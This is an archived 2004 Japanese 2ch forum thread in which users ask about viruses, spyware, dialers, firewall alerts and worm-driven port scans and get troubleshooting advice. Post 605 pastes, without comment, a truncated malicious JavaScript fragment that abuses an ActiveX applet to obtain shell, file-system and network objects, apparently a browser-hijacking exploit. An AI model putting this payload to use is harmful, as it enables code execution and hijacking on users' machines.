472 :449:04/05/18 17:53
対応方法:検出したファイルはすべて削除してください。
とのことですが、具体的にどのような手順で削除すればいいのですか?
トロくてすみません。。

473 :名無しさん@お腹いっぱい。:04/05/18 18:16
ノートンFWを使用してますが、毎日のようにトロイの木馬による攻撃を検知します。
本当の犯人を特定する方法は無いでしょうか?
攻撃元をIPドメインサーチで調べてみたら、外国の大学とかで、踏み台にされてる
ようでした。
又、自分のIPアドレスを変更すれば、攻撃もされなくなるような気がするのですが、
そういう方法は無いのでしょうか?
現在、YahooBBの8Mコースに入ってます。

474 :名無しさん@お腹いっぱい。:04/05/18 18:22
>>473
相手はあなたを特定して侵入を試みてるわけじゃないからIP変えても
無駄。トロイを飼ってる人がいないか探してるだけ。犯人の特定も
難しい。ルーター入れれば静かになる。

475 :名無しさん@お腹いっぱい。:04/05/18 18:27
>>472
エクスプローラを使った事はある?
それで消せば良いんじゃないか?
ウイルススキャンした時に、ウイルス本体の場所は表示しているはず。

>>473
悪いことは言わないから、どうすれば良いのか分からないなら下手に手出ししない事。
PFWなどで防げているなら無視しとけ。

476 :名無しさん@お腹いっぱい。:04/05/18 19:02
>>472
http://pc5.2ch.net/pcqa/

477 :名無しさん@お腹いっぱい。:04/05/18 19:14
>474・475
レスありがとうございます。
ある日突然、攻撃が始まったものですから、特定して狙われてるのかと・・・
キモチ悪いけど、FWで防げてるということで、とりあえず我慢します。

478 :449:04/05/18 19:22
感染したファイルは、C:\Documents and Settings\Owner\Local Settings\Temp〜.exeですが、
スタート→検索で消せますか?



479 :名無しさん@お腹いっぱい。:04/05/18 19:27
>>478
http://pc5.2ch.net/pcqa/
ここで勉強汁

480 :名無しさん@お腹いっぱい。:04/05/18 19:30
>>457
プログラムがninjaの何かだって特定できてるんでそ?
だったら、それアプリのloopbackだよ
接続アドレスが127.0.0.1とか127.0.0.2とかなってない?
検索ninjaは知らないけど、デジカメninjaがローカルプロクシみたいの使うから
似たようなもんじゃないの
許可して大丈夫、と思う

481 :名無しさん@お腹いっぱい。:04/05/18 20:47
>>45釣りじゃないよ

482 :450:04/05/18 20:48
変更できません。ていわれる

483 :名無しさん@お腹いっぱい。:04/05/18 21:24
御存知のようでしたら教えていただけると助かります。

CH系のスパイウェアにひっかかってしまい、
CHshredderで、"CWS.Yexe"であると診断されたので即削除したんですが、
起動時に「C:\WINDOWS\system32\services\wmplayerが無いので動かない」
「C:\WINDOWS\system32\services\mplayer」を叩こうとしてるレジストリを削除してくれ
というエラーが出ます。
ですが、regeditで調べてみましたが、該当するようなレジストリは無かったように思えます。

ゴミ箱をみると、CHshredderで削除した時刻に、たしかに該当ファイルが存在しました。
明らかに怪しいので戻す気にはならないんですが、起動時に毎度毎度上がってくるのは
非常に鬱陶しいので、どうにかしたいと思っております。

御存知でしたら回答をよろしくお願いします。

484 :名無しさん@お腹いっぱい。:04/05/18 21:34
忘れてました。
OSはXP Homeです。

このフォルダにそもそもwmplayer.exeファイルが
存在していたかどうかもわからないので、
もし手が空いている方がいらしったら、手持ちのファイルを見て頂けませんでしょうか。
450〜500KB前後のファイル用量でしょうか?

485 :483:04/05/18 21:57
すいません。
海外サイトから回答例を見つけました。

msconfig.exeからスタートアップを選択すると
該当ファイルがRunされるように設定されていたようです。

ご迷惑を掛けて申し訳ありませんでした。

486 :名無しさん@お腹いっぱい。:04/05/18 22:01
今日エロサイトを閲覧していたら変なものが勝手にダウンロードされたようで、
それ以来アドレスバーの下にISEARCHというものがくっつくようになってしまいました。
非常に不気味なので、対処方法教えていただけませんでしょうか。
(たまに広告が出て、そのウインドウでの操作が効かなくなります)

487 :名無しさん@お腹いっぱい。:04/05/18 22:07
>>486
スパイウェアですな。
↓のスレのテンプレよく読むべし

【総合】スパイウェア予防駆除 Part3
http://pc5.2ch.net/test/read.cgi/sec/1083759490/

488 :名無しさん@お腹いっぱい。:04/05/18 22:08
ttp://firedragon.homelinux.com/moelabo/imgboard.cgi

これを踏んでしまいました。どうすればいいでしょうか?

489 :名無しさん@お腹いっぱい。:04/05/18 22:11
>>488

何ともないが。

490 :名無しさん@お腹いっぱい。:04/05/18 22:14
まじっすか?
クリックすると、エロサイトが立ち上がり、
再起動しても、再び同じサイトが立ち上がるんです。

491 :名無しさん@お腹いっぱい。:04/05/18 22:17
ダイヤラーってどんな電話番号にアクセスさせるんですか?
ダイヤルQ2以外にありますか?

492 :名無しさん@お腹いっぱい。:04/05/18 22:20
>>491
国際電話。聞いたことないような国にダイヤルしたりもする。

493 :489:04/05/18 22:23
ノートンセキュリティ2004入ってるから当然か

494 :名無しさん@お腹いっぱい。:04/05/18 22:23
>>492
さっきダイヤラーが検出されたので駆除したんですけど、やばいですかね?

495 :若葉マーク:04/05/18 22:23
ブラクラチェック(ブラクラでやばいで)しようとすると、ウイルス
バスター(NORTON2004)の表示で『悪質なスクリプトを検出しました』
とどこのHPでも出てきます。なんでです?ちなみに自分はXPで
ノートンは今日いれたばっかです。

496 :名無しさん@お腹いっぱい。:04/05/18 22:35
>>495
ウイルスバスター(NORTON2004)なんてめずらしいもん
つかってるからだよ

497 :名無しさん@お腹いっぱい。:04/05/18 22:45
るーたつかっててもふぁいぁうおーるってひつようなの?

498 :名無しさん@お腹いっぱい。:04/05/18 23:04
ひつようないとおもうならつかわなきゃいい

499 :名無しさん@お腹いっぱい。:04/05/18 23:17
まあだまされたとおもってつかっておきなよ

500 :名無しさん@お腹いっぱい。:04/05/18 23:18
駆除も隔離もできないんだけど(ウイルス)・・どうするの?

501 :名無しさん@お腹いっぱい。:04/05/18 23:22
ウイルスバスター(NORTON2004)

新製品なんだよ。

502 :名無しさん@お腹いっぱい。:04/05/18 23:25
>>500
削除

503 :名無しさん@お腹いっぱい。:04/05/18 23:34
>>500
コレクション

504 :名無し:04/05/18 23:40
昨晩409からnetskyうんぬんで素人丸出しの書き込みをしていたものです。
みなさまの助言を参考に無事解決させていただきました。ありがとうございます。

結局のところIE→ツール→インターネットオプション→一時ファイルの削除
でよかったんですが、「オフラインのファイルも削除する」と言う項目があり、
そこにチェックを入れてなかったからウイルスを削除できなかったようです。

昨晩ご協力をいただいた方には本当に感謝しております。お騒がせしました。


505 :名無しさん@お腹いっぱい。:04/05/19 01:11
PCがついにウィルス感染してしまいました。
今回は何とか修復できそうなんですが、今後はウィルス対策を
ちゃんとしなければと実感させられました。
色々なウィルス対策ソフトがあるので、どれを選んでいいか
正直わかりません。
出来ればオンラインでインストールしたいのですが、
何がいいのでしょうか?

506 :名無しさん@お腹いっぱい。:04/05/19 01:25
>>505
↓のHP見て自分で決めれ。
ttp://www10.plala.or.jp/palm84/antivirus.html

507 :名無しさん@お腹いっぱい。:04/05/19 01:53
IEを起動するとアドレスが"auto:blank"になって英語の検索ページに
なってしまいます。ツールのインターネットオプションでホームを指定しても
auto:blankになってしまいます。
 ちなみに、この症状になったのは変なサイトに行ってしまった時からです。
Nortonでは正常で、Spypodでのクリーニングも完了してます。
どうすれば治りますか?

508 :名無しさん@お腹いっぱい。:04/05/19 01:59
すいません
>>507はauto:blankではなくabout:blankでした

509 :名無しさん@お腹いっぱい。:04/05/19 02:13
>>507
CoolWebShredderかな。
↓見てみて。
ttp://higaitaisaku.web.infoseek.co.jp/removecws.html

それとちゃんと定義ファイルのアップデートはしてるかな?


510 :名無しさん@お腹いっぱい。:04/05/19 03:01
>>509
ありがとう、解決しました
ちなみにこれの予防策ってあるんですか?
むやみにリンクを踏まないことが一番の予防なのでしょうが・・・

511 :名無しさん@お腹いっぱい。:04/05/19 07:49
>510
↓のページとか
ttp://higaitaisaku.web.infoseek.co.jp/korobanu.html
↓ページの「スパイウェア予防アプリケーション」
ttp://higaitaisaku.web.infoseek.co.jp/menu5.html
あたりを参照のこと。


512 :名無しさん@お腹いっぱい。:04/05/19 10:18
505です。
お返事ありがとうございました。
506で教えて頂いたアドレスが開けないのですが
ほかにありましたら教えていただけますか?

513 :名無しさん@お腹いっぱい。:04/05/19 10:48
>>512
開けるぞ?

もしかして、最初のh抜きのURLをそのまま入れてるんじゃないか?

514 :名無しさん@お腹いっぱい。:04/05/19 11:05
失礼します。
Gaobot.AOに感染してしまい、IEがhttp://www.28.bz/domain/register.phpにしかアクセスできなくなってしまいました。
対象ファイルを削除しシマンテックの駆除ツールも試したのですが、治りません。
ご指導の程よろしくお願いします。

515 : ◆VIRUSzXyeo :04/05/19 11:29
>>514
OSは?MeとかXPならシステムの復元をOFFにしてから実行した?
つttp://www.symantec.com/region/jp/sarcj/data/w/w32.gaobot.removal.tool.html
このページ良く読んでね。

516 :514:04/05/19 11:34
>>515
どもども。OSは2kです。

517 :名無しさん@お腹いっぱい。:04/05/19 11:39
>>516
駆除ツールを実行したときのメッセージは?

Total number of the scanned files. (スキャンされたファイル数)
Number of deleted files. (削除されたファイル数)
Number of terminated viral processes. (停止された有害プロセスの数)
Number of fixed registry entries. (復元されたレジストリ項目)
Stopped and deleted viral processes and services. (停止及び削除されたプロセスとサービス)

成功すると上のメッセージが出るはずなんだけど。



518 :514:04/05/19 12:11
>>517
ログファイルですが
Symantec Gaobot FixTool 1.0.11.0

C:\System Volume Information: (not scanned)
D:\System Volume Information: (not scanned)
W32.Gaobot has not been found on your computer.

一回駆除してるから見つからなかった(あたりまえ)のですが、IEの方だけ治りません。

519 :514:04/05/19 12:17
うぁ、すみません。
串解除したら直りましたヽ/ 冫、)ノ ズコー
お騒がせして申し訳ありませんでした

520 :名無しさん@お腹いっぱい。:04/05/19 12:17
>>518
IEを修復してみよう。
アプリケーションの追加と削除→IEを選ぶと修復って項目があるはず。

521 :名無しさん@お腹いっぱい。:04/05/19 12:31
教えてください。
会社でNorton AntiVirus Corporate Edition 7.60を
使ってるんですが、ウイルスメールがきてもうんともすんとも言わず、
定時スキャンを設定しても動きません。
どうしてでしょうか。
OSはXPのProfessionalです。

522 :名無しさん@お腹いっぱい。:04/05/19 12:43
>>521
ウイルスデータの更新してないんじゃないの?

523 :名無しさん@お腹いっぱい。:04/05/19 12:49
>522
こまめにしてます・・。

524 :名無しさん@お腹いっぱい。:04/05/19 13:02
質問です。とあるサイトの掲示板で全く関係のない第三者
に個人情報を晒され問題になっているんですけど、ソースをみると
IP、ホスト名が表示されるんですが、情報が漏れたのは
そこからと考えてもよいのでしょうか?

525 :名無しさん@お腹いっぱい。:04/05/19 13:34
>>521
聞く場所間違えてるぞ(w

526 :名無しさん@お腹いっぱい。:04/05/19 13:40
>525
ここじゃだめでしたか。すんません。

527 :名無しさん@お腹いっぱい。:04/05/19 15:18
>>524
IPから個人を特定できるのは、警察や裁判所等の公的権力だけ(建前上)。
それ以外ならば、
 1.自分で他の場所に晒していた個人情報。
 2.どこかから漏れた個人情報。
 3.socialな方法。つまり知り合い等。
が思い付くかな。
どれかに心当たりある?

528 :527:04/05/19 15:19
ちなみに個人情報ってどの程度の?
プロバイダと地域なら誰でも判るぞ(w

529 :名無しさん@お腹いっぱい。:04/05/19 17:05
エクスプローラーの最新版使ってるんですが、
セキュリティを「高」にしていたら、問題ないんですが、
「中」にしたら、Active-xだかが、表示に必要なページをだしたり、
もしくは、ページをどこか開こうとしたら、「問題が発生しました。エラーを送信しますか?」
とかのエクスプローラーのエラーが出て、エクスプローラーが閉じてしまう。

これって、ウィルスにやられているんですかね?
一応スパイウェアチェックしても、特に何もないし、エクスプローラーのコンポーネントを
再インストールしたりするんですが、やっぱり駄目です・・・。うぅ・・・。


530 :529:04/05/19 17:12
すいません!!OSは98のSEです。ADSL12MでOCNです。

531 :名無しさん@お腹いっぱい。:04/05/19 17:25
ケーブルで接続しています。
本日、頻繁にノートンが反応し、
「sokets de torois vl」による警告が表示されます。
(10分間に8回以上。)
攻撃元IPを見ると毎回違う番号なのですが
これはケーブルネットが固定IPのため、粘着に取り付かれたと
考えるべきなのでしょうか?

532 :名無しさん@お腹いっぱい。:04/05/19 17:31
>>531
そうかもしれないし、ただ単に無差別に探してるだけかもしれない

533 :名無しさん@お腹いっぱい。:04/05/19 17:50
動画のmpgeファイルにウイルスを仕組まれてることはありますか?
その場合再生すると感染するのかな?

534 :名無しさん@お腹いっぱい。:04/05/19 17:52
>>529
エロサイト見てたら…助けてください!part24
http://pc5.2ch.net/test/read.cgi/pcqa/1084800180/
ここのテンプレとかは試したの?

それでも駄目なようであれば、リカバリを検討した方が良いかも。

535 :524:04/05/19 17:57
>>527
その問題となった文章自体は即削除されて見ていませんが
後に続く内容から、その人の肩書きと職場を書き込まれて
しまったようです。やっぱり知り合いなのかもしれませんね。

536 :名無しさん@お腹いっぱい。:04/05/19 18:21
>>529
マカフィーかシマンテックっか忘れたがそんな症状がでるウイルスが載ってたぞ

537 :名無しさん@お腹いっぱい。:04/05/19 19:21
>>531
俺もSokets de Torois v1.!!
昨日あたりから5〜10分おきに来る
警告出るのがマジうざいくらいに

538 :名無しさん@お腹いっぱい。:04/05/19 20:15
zoneAlarm使っている物ですが、不正アクセスなどが一向に来ないんですが・・・・
コレって進入されて裏口作られちゃってんでしょうか・・・・_| ̄|○

539 :名無しさん@お腹いっぱい。:04/05/19 20:17
>>538
ルーター使ってたらそっちの方で先に弾くから来ないよ

540 :538:04/05/19 20:22
>>539
使って無いですはい。。。

541 :名無しさん@お腹いっぱい。:04/05/19 20:24
>>540
ログは見た?
真っ白ってことは無いだろ?

542 :名無しさん@お腹いっぱい。:04/05/19 20:35
真っ白ってことは無いですけど・・・・・信頼できる物しかないです・・・・・

543 :名無しさん@お腹いっぱい。:04/05/19 20:40
>>542
そいじゃ、こっちへいったほうがいいよ

ttp://pc5.2ch.net/test/read.cgi/sec/1084801676/

544 :名無しさん@お腹いっぱい。:04/05/19 21:38
>>531
うちもです!もしかして、INS2001?うざい・・・。
警告鳴りっぱなしです。

545 :名無しさん@お腹いっぱい。:04/05/19 21:50
>>544
2002。回線繋いで一秒後に攻撃され以降数え切れず・・・

546 :名無しさん@お腹いっぱい。:04/05/19 21:52
セキュリティチェックサイトでのチェックでは
全てステルスのほうがいいのですか?

547 :名無しさん@お腹いっぱい。:04/05/19 22:00
ノートン2004を最近更新のため、最購入したのですが、
その、インターネットセキュリティーで、
インターネットセキュリティーをオフにすれば
2ちゃんに書き込みできるのですが、
オンにしていると、書き込みできません。何か解除方法はないでしょうか?

548 :名無しさん@お腹いっぱい。:04/05/19 22:06
>>547
専用ブラウザ使ってる?

549 :名無しさん@お腹いっぱい。:04/05/19 22:07
>>547
もしかしてIE?


550 :547:04/05/19 22:07
はい、使っております。ちなみにかちゅ〜しゃです。

551 :名無しさん@お腹いっぱい。:04/05/19 22:10
>>550
そしたら2chのログを除外しなさい、以上、

>>546
(。A 。 )ワケワカラン

552 :名無しさん@お腹いっぱい。:04/05/19 22:28
>>531&>>544-545さん
これが原因らしいです
TCP 5000番へのトラフィックが増加、犯人は2種類のワーム
警察庁は5月18日、TCP 5000番ポートに対するトラフィックが増加しているとして警戒を呼びかけた。
原因はどうやら新たな2種類のワームのようだ。

同庁では「トラフィックの増加の原因は今のところ不明」としているが、
SANSのInternet Storm Centerの情報によれば、どうやら2種類のワームが原因のようだ。
1つは、Sasser同様、MS04-011に含まれるLSASSの脆弱性を悪用する「Bobax」。
もう1つはLSASSの脆弱性だけでなく、Blasterが悪用したRPC DCOMの脆弱性など
複数の既知の脆弱性を利用する「Kibuv.B」である。
いずれも、既知のセキュリティホールを悪用するワームであるため、
Windows Updateを利用するなどしてパッチを適用しておけば感染は免れるはずだ。
また18日正午の時点では、ウイルス対策ベンダー各社はまだ日本語での情報は提供していないが、
英語版の情報/定義ファイル更新が進みつつある。定義ファイルが更新された後には、
できる限り早めのアップデートが望ましい。

http://www.itmedia.co.jp/enterprise/0405/18/epn05.html

ちなみに俺のはNIS2002です。
俺のも警報鳴りっぱなしです。

553 :名無しさん@お腹いっぱい。:04/05/19 22:32
>>551
レスどもです。
ログ除外を上手くできるかどうか、分かりませんが、
少し調べてやってみます。ありがとうございました。

554 :544:04/05/19 22:53
>>552
おおっ!ありがとう!!
NIS入れておけば大丈夫なんでしょうか?
どなたか教えて下さい。すみません。

555 :名無しさん@お腹いっぱい。:04/05/19 22:55
>>554
警告出てるならブロックしてるんだろ
ルータ入れたら静かになる

556 :名無しさん@お腹いっぱい。:04/05/19 23:02
>>555
アフォ?
ルーターあってもポート閉じてなかったら意味ねーよ


557 :名無しさん@お腹いっぱい。:04/05/19 23:07
>>556
アフォ?

558 :552:04/05/19 23:15
>>554
ヾ(´▽`;)ゝエヘヘ
実は俺は2002のトラブルがらみがあったので別のスレで同じ事を聞いたのですよ。
で、答えが、552だったのですよ。
それと、554の答えは、555で警告が出てる以上はブロックしているので大丈夫ですよ。
ちなみに俺のは、警告が30分で40回以上出てます(x_x)

559 :名無しさん@お腹いっぱい。:04/05/19 23:18
漏れは10秒以内に3回は警告出た時あったぞ
今は比較的落ち着いている。っても10分に1、2回

560 :名無しさん@お腹いっぱい。:04/05/19 23:29
自分のサイトで公開しているPOP3フリーメールアドレスに、
普段からスパムが山ほど来ているのですが、
今日、ものすごく気になるものが来てしまいました。
hotmailのアドレスの、もちろん知らない人からなのですが、
本文が一言「I have your password!」
そして Norton AntiVirus Deleted1.txt という添付ファイルが付いています。(未開封)
私のパソコンにはNorton AntiVirusとfirewallを入れていて、
プロバイダの方でもウィルスチェックと不正アクセス防止のサービスに加入しているのですが、
これはただのいたずらメールと思って良いのでしょうか?
最悪の場合、どういったことが考えられますか?
ちょっと怖いです。

561 :名無しさん@お腹いっぱい。:04/05/19 23:33
>>560
NAVがメールに添付されたウィルスを駆除したってことでは?
一応そのまま削除してウィルススキャンしてみるべし

562 :名無しさん@お腹いっぱい。:04/05/19 23:59
初心者にお奨めのソフトは何ですか?
ノートンは2002現在進行中の騒ぎを見てると怖くて使えません。
セキュリティソフトメーカがPCをダウンさせて置いて平気だなんて信じられない。

563 :名無しさん@お腹いっぱい。:04/05/20 00:02
>>560
>本文が一言「I have your password!」
昔あった「I LOVE YOU」ウイルスと同じで、言葉に惑わされちゃいかん。
不安ならパスワードを変えればいい。

564 :名無しさん@お腹いっぱい。:04/05/20 00:08
>>556
通常閉じてるだろ

565 :名無しさん@お腹いっぱい。:04/05/20 00:23
C:\load.exeを発見しましたが、
脅威でないload.exeというのは存るのでしょうか?

566 :名無しさん@お腹いっぱい。:04/05/20 00:30
なんか知らないところからタイトル空白で5KBほどのメールがきてた
速攻捨てたけどヤバポ?

567 :560:04/05/20 00:39
>561
ウィルススキャンしてみましたが、大丈夫でした。

>563
安心しました。ありがとうございます。
パスワードって、これを受信した私のメールアドレスのやつですよね?


568 :名無しさん@お腹いっぱい。:04/05/20 01:12
おああああ

569 :名無しさん@お腹いっぱい。:04/05/20 01:43
>>552さんやみなさんと同じで、NIS2002から頻繁に同じ警告が出ます。 侵入してくるIPが毎回同じISPなんですが、同じISP内で狙われてるのでしょうか… ウイルス感染が目的と思っていいのですか。 ルータを使用すると解消するというのはどういう事ですか。 初心者ですみません

570 :名無しさん@お腹いっぱい。:04/05/20 01:47
携帯からなんで改行できてなかったらすいません

571 :ウインドXP:04/05/20 02:41
ノートンの期限が切れたまま放置していたんでオンラインスキャンかけたら
トロイ他3つほどのウイルスが検出されました
感染ファイルそのものを消去してみたんですが治りません(ノω・、)
んで、金がないんで体験版のウイルスバスターをインストしようとしたら
期限切れのノートンとファイアーウオールを削除しろって出るんだけど
削除せずにインストする方法もしくは手っ取り早くウイルスを削除する方法が
あれば教えていただきたいのですがm(_ _)m

572 :名無しさん@お腹いっぱい。:04/05/20 03:32
>>569
特に狙われているわけではない(一般的には)
感染PCが、自分のアドレスに近いものからランダムに相手を選び、感染させる
PCを探しているだけ。詳細は、http://www.cyberpolice.go.jp/ とか、
ウイルス感染の仕組みのサイトを読めば出ている。

ルーターを使うとどうして解消するのか?(家庭用ブロードバンドルーター)
インターネット------------ルーター------PC
(グローバルアドレス)      (プライベートアドレス)

インターネットに繋がるには、グローバルアドレスでないと外のPCと通信できない
ルーターの中はプライベートアドレスになっていて、ルーターが仲介役をして
外と繋がるようになっている。外からは勝手に入って来れないが、「中」からの
問い合わせの返事は入ってこれる。(あくまで適切に設定してある場合)
外からはルーターまでしか見えない。
普通の家庭用ブロードバンドルーターの初期設定では心配いらん。
(業務用のルーターはまた話が別)

もっと詳しい事は、ブロードバンドルーターの仕組みとか、TCP/IPとかで
ググッてくれ。


573 :531:04/05/20 04:27
>>532
レスが遅くなってしまいすみません。
どうやら落ち着いたようです。
その後のログを読むとルーターを導入したほうがいいようですね。
勉強してきます。

574 :名無しさん@お腹いっぱい。:04/05/20 04:31
win2kの再インストが終わったばかりで、まだupdateしてません。
ノートンIS2002のupdateは終了しました。
先ほど、ノートンでrandexなるウィルスに感染したとの情報が出たのですが、
完全スキャンをかけると検出されません。
感染したままなのでしょうか?

あと、FWを設定しておけば、不正アクセスによるウィルス感染は防げるのですか?
OSを入れなおした原因がwin2kのUpDate後の不調だったのと、
当方ダイアルアップでの接続のため、DLに時間がかかってしまうので
updateを控えようかと思っているのですが。


575 :名無しさん@お腹いっぱい。:04/05/20 04:34
教えて下さい、家のPCも>>143氏と同じ様な症状になったんですが
で、今出先で仕事中なんで携帯版googleでexplore.exeを検索したら
何やらウイルスとかトロイ関係のページばかり出てくるじゃないですか
これってやっぱりウイルスに感染してるんでしょうか?
最新定義のノートン先生におまかせすれば駆除できますでしょうか?
心配で仕事が手に付かな((;゚Д゚)ガクガクブルブル

576 :名無しさん@お腹いっぱい。:04/05/20 04:36
質問します。
昨日からウイルスと戦っています。
が、"McAfee VirusScan"で検出しても、駆除も削除も出来ない憎い奴が散在して困ってます。
W32/Pate.b等のウイルスですが。

該当ファイルはゴミ箱にすら逝きません。
拡張子変更で無害化出来るのでしょうか?
何か良い方法があれば御教授願います。

577 :名無しさん@お腹いっぱい。:04/05/20 05:20
ボタン押すとかっTEにプRoグらmuがひRaいたRiとじたRiします。mOじmOmaんぞくにうてない。。。

578 :名無しさん@お腹いっぱい。:04/05/20 13:13
>>576
セーフモードからの削除はためした?
拡張子を変えたら普通は無害化。
*.exeを*.hoge等に変えたら実行されないのといっしょ

579 :574:04/05/20 13:24
シマンテックのHPで、randexウィルスの駆除方法を見つつ作業をしてみました。
http://www.google.co.jp/search?q=cache:vNUdTI4AaWgJ:www.symantec.com/region/jp/sarcj/data/w/w32.randex.gen.html+randex.gen+&hl=ja&lr=lang_ja
NAVでウィルススキャンをするも、感染ウィルスは検出されないのですが、
活動ログを見ると、

C:\WINNT\system32\TFTP568
は W32.Randex.gen ウィルスに感染しています。
このファイルを修復できません。

というログがいくつか見られます。
この場合、このTFTP568ファイルの取り扱いはどうすればいいのでしょうか?


580 :名無しさん@お腹いっぱい。:04/05/20 14:12
質問します
強制再起動されます。(あと○○秒で再起動とかなんとか)

これってウイルスか何かがおこっているのでしょうか?

581 :名無しさん@お腹いっぱい。:04/05/20 14:30
>>580
99.9%ウィルスに感染してます。
トレンドマイクロやシマンテックのオンラインスキャンを
やればすぐわかります。

582 :名無しさん@お腹いっぱい。:04/05/20 14:56
>>572 すごい分かりやすい説明ありがとうございます!感染してる人が周りに沢山いるんですね。

NISで遮断してるようなら大丈夫でしょうか。

ルータも勉強しまつ。そのうちブラードバンドルータにしてみようと思います。

583 :名無しさん@お腹いっぱい。:04/05/20 15:46
>>582
まずはWindowsUpdateからだ。
アンチウイルスソフトやPFWの導入だけじゃなくて、WindowsUpdateをこまめに確認しないと。
もちろんNISは常に最新版なんだよな?

つか、>>1をよく読んでから質問してくれ。情報が全然足りんよ。

584 :名無しさん@お腹いっぱい。:04/05/20 18:21
ブリーフケースに入れてた画像(プライベートのエロ画像含む)
がいきなり大量になくなってるんですが
これはハッキングされて持っていかれた可能性とかあるのでしょうか?

585 :名無しさん@お腹いっぱい。:04/05/20 18:24
>584
お母ちゃんに消された・・・

586 :名無しさん@お腹いっぱい。:04/05/20 18:26
>>584
可能性が亡きにしもあらずだけど、>>585氏の言うとおり身近な人間がk(ry

587 :名無しさん@お腹いっぱい。:04/05/20 18:38
>>584
可能性の有無だけ問われても ある としか言いようがない
焦るのはわかるが>>1をよく読もう

588 :名無しさん@お腹いっぱい。:04/05/20 18:47
プライベートのエロ画像ハァハァ

589 :五百六十五:04/05/20 18:54
聞き方がまずかったのか。
私のパソの場合C:はシステムドライブですが、C:\load.exeなんてWin98のシステムに無いですよね。

IE6.0SP1 NAV2004

590 :名無しさん@お腹いっぱい。:04/05/20 19:14
とあるEXEファイル実行したら、画面上から紅い点線がまっすぐと、ゆっくり下に下りてきたのですが、
途中で電源をきりました、OSも無事立ち上がり、C:・D:もフォーマットとかされていないようですけど、、、
これはウィルスとかトロイの可能性ありますか?

591 :名無しさん@お腹いっぱい。:04/05/20 19:30
>>590
キンタマかな?

592 :名無しさん@お腹いっぱい。:04/05/20 19:44
IEで検索サイト等を閲覧しようとすると、
別ウィンドウが起動して、「serch・・・」という検索サイトが表示されてしまいます。
ウィルスでしょうか? 解決方法が分かりません。

593 :名無しさん@お腹いっぱい。:04/05/20 20:03
最近になってネットの表示が極端に遅くなったり、ほとんど固まったりするんですが、
これはハッキングのせいでしょうか。(NISは頻繁に警告表示を出しますが、ウイルス
チェックをすると感染なしいう結果が出ます。)

594 :名無しさん@お腹いっぱい。:04/05/20 20:08
ウイルスメールにノートンが反応しました。
これまでに数回あり、検疫をおこなうと
「安全です」という表示が出ていたのですが
先程受信した物を検疫すると
「まだウイルスに感染しています」と表示されました。

プレヴューウインドウをオフにし、
削除済みボックスからも消去したのですが
これで問題はないのでしょうか?

595 :名無しさん@お腹いっぱい。:04/05/20 20:42
おすすめの串が載ってるサイトってありますか?
あるいはみなさんどの串を設定してますか?

596 :名無しさん@お腹いっぱい。:04/05/20 21:08
>>595
串を使わなければならない様な所には手を出さない。

597 :名無しさん@お腹いっぱい。:04/05/20 21:18
覚えのないアドレスからメールが届いており、怪しいなと思ったけど開きました。
案の定、ウイルスでした。ノートンが機能してくれたから大丈夫だったけど、
それ以来、毎日のようにウイルスメールが届くようになってしまいました。
あの時、開いたから、こちらのアドレスを覚えられてしまったのでしょうか?
どうしたらよろしいでしょう?こちらのメールアドレスはhotmailを使用しております。
よろしくお願いします。


598 :名無しさん@お腹いっぱい。:04/05/20 21:20
恥ずかしながら、
エロサイトで「sexcams.jp」なる迷惑プログラムを入れられてしまいました。

CドライブのProgramFilesにある当該フォルダを削除しようとしても
「使用中またはライトプロテクトされているため削除できません」というメッセージが
出ます。
傍迷惑なポップアップがしつこくて参っています。どのようにすれば削除できるので
しょうか。
アドバイスよろしくお願いします。

599 :597:04/05/20 21:22
開いたというか、メールを開いて、メールの中に書いてあったURLをクリックしました。
それが案の定ウイルスだったのです。
バイナリファイルになっております。
本文は下記のURLをクリックすると読めます
のようなことが書いてあったのでクリックしました。


600 :名無しさん@お腹いっぱい。:04/05/20 21:37
>>598
「使用中」って出たら、セーフモードか回復コンソールを試せ。
又は怪しいプロセスやサービスを殺すとか。

601 :名無しさん@お腹いっぱい。:04/05/20 21:41
>600
すいません、「セーフモード」「回復コンソール」とは何でしょうか?
怪しいプロセスやサービスとは?
やり方を教えてください。度々もうしわけありません。

602 :529:04/05/20 21:45
>>534
すいません!!誘導ありがとうございます!まだ、読んでませんが、早速試してみます。

>>536
うげげ、ウィルス・・・。オンラインスキャンとかだと、発見されなかったりするんですよね。
ってか、オンラインで発見されるようだと、もう手遅れっぽいとか・・・。
マカフィーとシマンテック????良くわかりませんが、(会社名?)ぐぐって調べてみます。
ありがとうございます!

603 :598:04/05/20 21:53
テンプレ読み返したら何となく分かりました。
返答くださった方、ありがとうございました。

604 :名無しさん@お腹いっぱい。:04/05/20 21:54
>>599
「オマイのメールアドレスは確かにオマイが使ってるものだ!」と相手に教えたんだよ。


605 :名無しさん@お腹いっぱい。:04/05/20 22:09
<!--IPT language=JavaScript
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent </APPLET ");
function AddFavLnk(loc, DispName, SiteURL){var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");Shor.TargetPath = SiteURL;Shor.Save();}
function f(){
try{a1=document.applets[0];a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Shl = a1.GetObject();a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();FSO = a1.GetObject();a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");a1.createInstance();Net = a1.GetObject();
try{

606 :名無しさん@お腹いっぱい。:04/05/20 22:50
>>593
NISが2002なら
http://pc5.2ch.net/test/read.cgi/sec/1084716065/
を読むべし。

607 :名無しさん@お腹いっぱい。:04/05/20 23:45
会社のPCでIEを立ち上げても自社のホームに飛ぶだけで他の(ヤホーとかグーグル)WEBに飛べないんです。。
これはイントラネットというやつなのでしょうか?どう設定すればWEBを観れるようになるのでしょうか?
OSはWINNTです。。
教えてくだせぇ エッチィ人。

608 :名無しさん@お腹いっぱい。:04/05/20 23:54
>>607
オマイの会社のコンピュータ関係の管理者に聞きな。

609 :名無しさん@お腹いっぱい。:04/05/21 00:33
学校のLAN内で、vigil等を使って流れているパケットを覗き見してるお馬鹿がいます。
このようなパケットモニタリングをするソフトによる監視をブロックするには、
どのポートを閉じれば良いのでしょうか?
それとも無理???

610 :名無しさん@お腹いっぱい。:04/05/21 00:52
ファイアーウォールソフトとしてZoneAlarmを使っているのですが、ネット接続してると
vsmon.exeという実行ファイルのメモリ使用量が異常に大きくなってしまいます。
この現象を止める方法は無いのでしょうか?

611 :名無しさん@お腹いっぱい。:04/05/21 01:03
http://pc5.2ch.net/test/read.cgi/sec/999636595/905
ここのリンクの中にある先を踏んだら・゚・(ノД`)・゚・。

